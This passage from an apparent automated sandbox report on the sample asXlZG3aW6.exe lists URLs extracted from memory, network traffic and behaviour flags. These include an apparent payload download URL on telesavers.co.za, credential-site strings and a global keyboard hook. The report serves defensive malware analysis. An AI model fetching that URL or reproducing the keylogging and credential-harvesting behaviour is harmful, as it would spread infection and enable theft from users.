or memory: http://geoplugin.net/json.gp
              Source: asXlZG3aW6.exe, 00000082.00000003.21793249809.0000000005256000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21947522575.0000000005259000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21947642663.000000000525C000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21947260967.0000000005248000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21785310662.0000000005255000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21777083214.0000000005255000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpg
              Source: asXlZG3aW6.exe, 00000082.00000003.21777083214.0000000005255000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gptn
              Source: asXlZG3aW6.exe, 00000082.00000002.26269649402.000000000525D000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21793249809.0000000005256000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21947522575.0000000005259000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21947642663.000000000525C000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21947260967.0000000005248000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21785310662.0000000005255000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21777083214.0000000005255000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpw
              Source: asXlZG3aW6.exe, 00000082.00000002.26269649402.000000000525D000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21793249809.0000000005256000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21947522575.0000000005259000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21947642663.000000000525C000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21947260967.0000000005248000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21785310662.0000000005255000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21777083214.0000000005255000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpx
              Source: bhv2AA3.tmp.131.drString found in binary or memory: http://i.pki.goog/r1.crt0
              Source: bhv2AA3.tmp.131.drString found in binary or memory: http://i.pki.goog/wr2.crt0
              Source: asXlZG3aW6.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
              Source: asXlZG3aW6.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
              Source: bhv2AA3.tmp.131.drString found in binary or memory: http://o.pki.goog/wr20%
              Source: bhv2AA3.tmp.131.drString found in binary or memory: http://ocsp.digicert.com0
              Source: bhv2AA3.tmp.131.drString found in binary or memory: http://ocsp.digicert.com0:
              Source: bhv2AA3.tmp.131.drString found in binary or memory: http://ocsp.digicert.com0F
              Source: bhv2AA3.tmp.131.drString found in binary or memory: http://ocsp.digicert.com0I
              Source: bhv2AA3.tmp.131.drString found in binary or memory: http://ocsp.msocsp.com0
              Source: bhv2AA3.tmp.131.drString found in binary or memory: http://ocsp.pki.goog/gsr10)
              Source: bhv2AA3.tmp.131.drString found in binary or memory: http://pki.goog/gsr1/gsr1.crt02
              Source: bhv2AA3.tmp.131.drString found in binary or memory: http://www.digicert.com/CPS0
              Source: asXlZG3aW6.exe, asXlZG3aW6.exe, 00000085.00000002.21797217468.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
              Source: asXlZG3aW6.exe, asXlZG3aW6.exe, 00000085.00000003.21796946361.000000000049D000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000085.00000003.21796891170.000000000049D000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000085.00000002.21797217468.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.com
              Source: asXlZG3aW6.exe, 00000085.00000002.21797163684.000000000019C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com/
              Source: asXlZG3aW6.exe, 00000085.00000003.21796946361.000000000049D000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000085.00000003.21796891170.000000000049D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.comata
              Source: asXlZG3aW6.exe, 00000082.00000002.26280391623.0000000036780000.00000040.10000000.00040000.00000000.sdmp, asXlZG3aW6.exe, 00000085.00000002.21797217468.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
              Source: asXlZG3aW6.exe, 00000082.00000002.26280391623.0000000036780000.00000040.10000000.00040000.00000000.sdmp, asXlZG3aW6.exe, 00000085.00000002.21797217468.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
              Source: asXlZG3aW6.exe, 00000083.00000002.21826845805.0000000000193000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
              Source: asXlZG3aW6.exe, 00000085.00000002.21797217468.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
              Source: asXlZG3aW6.exe, 00000082.00000003.21706373604.0000000005262000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000002.26269649402.000000000525D000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21706215895.0000000005262000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21793249809.0000000005256000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21947522575.0000000005259000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21947642663.000000000525C000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21947260967.0000000005248000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21785310662.0000000005255000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21777083214.0000000005255000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
              Source: asXlZG3aW6.exe, 00000083.00000003.21819327906.0000000002261000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21817489929.0000000002A81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chrom0;ord=8672137916610;
              Source: asXlZG3aW6.exe, 00000083.00000003.21818398050.000000000227D000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21819327906.0000000002261000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21819594967.000000000227D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=37393684334
              Source: asXlZG3aW6.exe, 00000083.00000003.21819327906.0000000002261000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21817489929.0000000002A81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7209567
              Source: asXlZG3aW6.exe, 00000083.00000003.21818802197.0000000002A86000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21818734347.0000000002A86000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21819235993.0000000002A86000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21818583602.0000000002A86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://acdn.adnxs.com/dmp/async_usersync.html?gdpr=1&gdpr_consent=CPM7kC1PM7kC1AcABBENBQCsAP_AAELAA
              Source: asXlZG3aW6.exe, 00000083.00000003.21819327906.0000000002261000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21817489929.0000000002A81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3739368433491;gt
              Source: asXlZG3aW6.exe, 00000083.00000003.21819327906.0000000002261000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21817489929.0000000002A81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3739368433491;gtm=
              Source: bhv2AA3.tmp.131.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
              Source: asXlZG3aW6.exe, 00000083.00000003.21822380312.0000000002269000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21821545612.0000000002269000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21819327906.0000000002261000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21822169342.0000000002269000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21821671607.0000000002269000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://capturemedia-assets.com/ig-bank/ad-engagement/startAnimation/main/index.html
              Source: asXlZG3aW6.exe, 00000083.00000003.21817489929.0000000002A81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
              Source: asXlZG3aW6.exe, 00000083.00000003.21819327906.0000000002261000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21817489929.0000000002A81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
              Source: asXlZG3aW6.exe, 00000083.00000003.21819327906.0000000002261000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21817489929.0000000002A81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
              Source: bhv2AA3.tmp.131.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
              Source: asXlZG3aW6.exe, 00000083.00000003.21819327906.0000000002261000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21817489929.0000000002A81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eb2.3lift.com/sync?
              Source: asXlZG3aW6.exe, 00000083.00000003.21818671304.0000000002A89000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://googleads.g.doubleclick.net/pagead/ads?gdpr=1&gdpr_consent=CPM7kC1PM7kC1AcABBENBQCsAP_AAELAA
              Source: asXlZG3aW6.exe, 00000083.00000003.21822380312.0000000002269000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21821545612.0000000002269000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21819327906.0000000002261000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21822169342.0000000002269000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21821671607.0000000002269000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://googleads.g.doubleclick.net/pagead/drt/s?v=r20120211
              Source: asXlZG3aW6.exe, 00000083.00000003.21822774060.0000000002262000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21818802197.0000000002A86000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21818734347.0000000002A86000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21825919693.000000000226D000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21822380312.0000000002269000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21822519040.0000000002269000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21821545612.0000000002269000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21822858833.0000000002267000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21819075063.0000000002A86000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21819011679.000000000226D000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21819327906.0000000002261000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21818947265.0000000002A86000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21822169342.0000000002269000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21821671607.0000000002269000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://googleads.g.doubleclick.net/pagead/drt/s?v=r20120211https://googleads.g.doubleclick.net/page
              Source: asXlZG3aW6.exe, 00000083.00000003.21819327906.0000000002261000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ib.adnxs.com/async_usersync_file
              Source: asXlZG3aW6.exe, 00000083.00000003.21826000488.000000000225C000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21826100226.000000000225C000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21826484939.000000000225F000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21826258540.000000000225C000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000002.21826845805.0000000000193000.00000004.00000010.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21826426317.000000000225C000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21826050494.000000000225C000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000002.21827997656.0000000002261000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
              Source: asXlZG3aW6.exe, 00000083.00000003.21826000488.000000000225C000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21826100226.000000000225C000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21826484939.000000000225F000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21826258540.000000000225C000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21826426317.000000000225C000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21826050494.000000000225C000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000002.21827997656.0000000002261000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com//
              Source: asXlZG3aW6.exe, 00000083.00000002.21826845805.0000000000193000.00000004.00000010.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21825595393.0000000002A97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/TI
              Source: asXlZG3aW6.exe, 00000083.00000003.21819327906.0000000002261000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21818947265.0000000002A86000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21826426317.000000000225C000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21818398050.000000000226D000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21826050494.000000000225C000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21822169342.0000000002269000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21821671607.0000000002269000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000002.21827997656.0000000002261000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21817489929.0000000002A81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&checkda=1&ct=1632306842&rver=7.0.6730.0&wp=l
              Source: asXlZG3aW6.exe, 00000083.00000003.21825919693.000000000226D000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21819011679.000000000226D000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21818398050.000000000226D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srfhttps://www.google.com/pagead/drt/uihttps://www.google.com/recaptcha
              Source: asXlZG3aW6.exe, 00000083.00000003.21826000488.000000000225C000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21826100226.000000000225C000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21826484939.000000000225F000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21826258540.000000000225C000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21826426317.000000000225C000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21826050494.000000000225C000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000002.21827997656.0000000002261000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/v104
              Source: asXlZG3aW6.exeString found in binary or memory: https://login.yahoo.com/config/login
              Source: asXlZG3aW6.exe, 00000082.00000003.21706373604.0000000005262000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000002.26269649402.000000000525D000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21706215895.0000000005262000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21793249809.0000000005256000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21947522575.0000000005259000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21947642663.000000000525C000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21947260967.0000000005248000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21785310662.0000000005255000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21777083214.0000000005255000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
              Source: asXlZG3aW6.exe, 00000083.00000003.21822774060.0000000002262000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21826000488.000000000225C000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21826100226.000000000225C000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21818302780.0000000002A86000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21826484939.000000000225F000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21818734347.0000000002A86000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21822380312.0000000002269000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21822519040.0000000002269000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21821545612.0000000002269000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21822858833.0000000002267000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21818583602.0000000002A86000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21826258540.000000000225C000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21819327906.0000000002261000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21818947265.0000000002A86000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21826426317.000000000225C000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21817130207.0000000002261000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21818398050.000000000226D000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21826050494.000000000225C000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21822169342.0000000002269000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21821671607.0000000002269000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000002.21827997656.0000000002261000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrd?lcid=1033&syslcid=2057&uilcid=1033&app=1&ver=16&build=1
              Source: asXlZG3aW6.exe, 00000083.00000003.21818802197.0000000002A86000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21819075063.0000000002A86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrdres://C:
              Source: asXlZG3aW6.exe, 00000083.00000003.21819327906.0000000002261000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21818947265.0000000002A86000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21818398050.000000000226D000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21822169342.0000000002269000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21821671607.0000000002269000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21817489929.0000000002A81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://servedby.flashtalking.com/imp/8/106228;3700839;201;jsiframe;Adobe;1000x463DESKTOPACROBATREAD
              Source: asXlZG3aW6.exe, 00000083.00000003.21816817116.0000000002A81000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21817130207.0000000002261000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
              Source: bhv2AA3.tmp.131.drString found in binary or memory: https://static-spartan-neu-s-msn-com.akamaized.net/_h/975a7d20/webcore/externalscripts/jquery/jquery
              Source: bhv2AA3.tmp.131.drString found in binary or memory: https://static-spartan-neu-s-msn-com.akamaized.net/spartan/en-gb/_ssc/css/b5dff51-e7c3b187/kernel-9c
              Source: bhv2AA3.tmp.131.drString found in binary or memory: https://static-spartan-neu-s-msn-com.akamaized.net/spartan/en-gb/_ssc/js/b5dff51-96897e59/kernel-1e4
              Source: asXlZG3aW6.exe, 00000083.00000003.21824645097.0000000002A9D000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21824737604.0000000002AEA000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21824954221.0000000002A81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
              Source: asXlZG3aW6.exe, 00000082.00000003.21947260967.0000000005230000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000002.26269410361.00000000051E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://telesavers.co.za/
              Source: asXlZG3aW6.exe, 00000082.00000002.26269410361.00000000051E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://telesavers.co.za/EsbmqCxkb162.bin
              Source: asXlZG3aW6.exe, 00000082.00000002.26269410361.00000000051E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://telesavers.co.za/u
              Source: asXlZG3aW6.exe, 00000083.00000003.21819327906.0000000002261000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tpc.googlesyndication.com/sodar/sodar2/224/runner.html
              Source: bhv2AA3.tmp.131.drString found in binary or memory: https://www.digicert.com/CPS0
              Source: asXlZG3aW6.exe, asXlZG3aW6.exe, 00000085.00000002.21797217468.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: asXlZG3aW6.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
              Source: asXlZG3aW6.exe, 00000083.00000003.21819327906.0000000002261000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/
              Source: asXlZG3aW6.exe, 00000083.00000003.21819327906.0000000002261000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0
              Source: asXlZG3aW6.exe, 00000083.00000003.21822380312.0000000002269000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21821545612.0000000002269000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21819327906.0000000002261000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21822169342.0000000002269000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21821671607.0000000002269000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/pagead/drt/ui
              Source: asXlZG3aW6.exe, 00000083.00000003.21819327906.0000000002261000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/api2/aframe
              Source: asXlZG3aW6.exe, 00000083.00000003.21819327906.0000000002261000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21816817116.0000000002A81000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21817130207.0000000002261000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21817489929.0000000002A81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehp
              Source: asXlZG3aW6.exe, 00000083.00000003.21819327906.0000000002261000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21816817116.0000000002A81000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21817130207.0000000002261000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21817489929.0000000002A81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp
              Source: bhv2AA3.tmp.131.drString found in binary or memory: https://www.msn.com/spartan/en-gb/kernel/appcache/cache.appcache?locale=en-GB&market=GB&enableregula
              Source: asXlZG3aW6.exe, 00000083.00000003.21819327906.0000000002261000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21817489929.0000000002A81000.00000004.00000020.00020000.00000000.sdmp, bhv2AA3.tmp.131.drString found in binary or memory: https://www.msn.com/spartan/ientp?locale=en-GB&market=GB&enableregulatorypsm=0&enablecpsm=0&NTLogo=1
              Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
              Source: unknownHTTPS traffic detected: 102.65.21.26:443 -> 192.168.11.20:49735 version: TLS 1.2

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Installs a global keyboard hook
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\asXlZG3aW6.exeJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 0_2_004051CA GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004051CA
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 131_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,131_2_0040987A
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 131_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,131_2_004098E2
